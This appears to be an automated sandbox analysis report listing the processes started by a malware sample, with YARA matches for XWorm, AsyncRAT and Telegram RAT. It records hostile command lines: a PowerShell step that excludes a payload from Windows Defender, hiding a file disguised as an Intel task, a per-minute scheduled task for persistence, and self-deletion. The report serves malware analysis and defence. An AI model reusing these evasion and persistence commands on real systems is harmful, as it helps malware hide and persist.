                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                Start time:17:13:33
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:4'438'776 bytes
                                                                                                                                                                                                                                                MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:17:13:39
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"
                                                                                                                                                                                                                                                Imagebase:0xca0000
                                                                                                                                                                                                                                                File size:90'112 bytes
                                                                                                                                                                                                                                                MD5 hash:07E410214A2AEB8F577E407154252F3C
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: ditekSHen
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:17:13:42
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                Imagebase:0x7ff605970000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:17:13:42
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                Start time:17:13:46
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:mode 65,10
                                                                                                                                                                                                                                                Imagebase:0x7ff61a570000
                                                                                                                                                                                                                                                File size:33'280 bytes
                                                                                                                                                                                                                                                MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                Start time:17:13:46
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff799c70000
                                                                                                                                                                                                                                                File size:863'093 bytes
                                                                                                                                                                                                                                                MD5 hash:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 11%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                Start time:17:13:48
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                                                                                                                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:17:13:48
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:17:13:49
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                Start time:17:13:49
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                Start time:17:13:51
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                Start time:17:13:59
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"
                                                                                                                                                                                                                                                Imagebase:0xe90000
                                                                                                                                                                                                                                                File size:4'451'328 bytes
                                                                                                                                                                                                                                                MD5 hash:0121D24D5F6392439A1D49C2904595E1
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                Start time:17:14:00
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                Start time:17:14:04
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                Start time:17:14:06
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                Start time:17:14:06
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                Start time:17:14:07
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 5208 -s 784
                                                                                                                                                                                                                                                Imagebase:0x7ff6eac00000
                                                                                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                Start time:17:14:09
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                                Start time:17:14:10
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                Start time:17:14:11
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff6b72e0000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"in.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff60c660000
                                                                                                                                                                                                                                                File size:1'827'328 bytes
                                                                                                                                                                                                                                                MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6b72e0000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6b72e0000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7934f0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                                                Imagebase:0x7ff65e1f0000
                                                                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                                Start time:17:14:13
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                                Start time:17:14:15
                                                                                                                                                                                                                                                Start date:20/12/2024
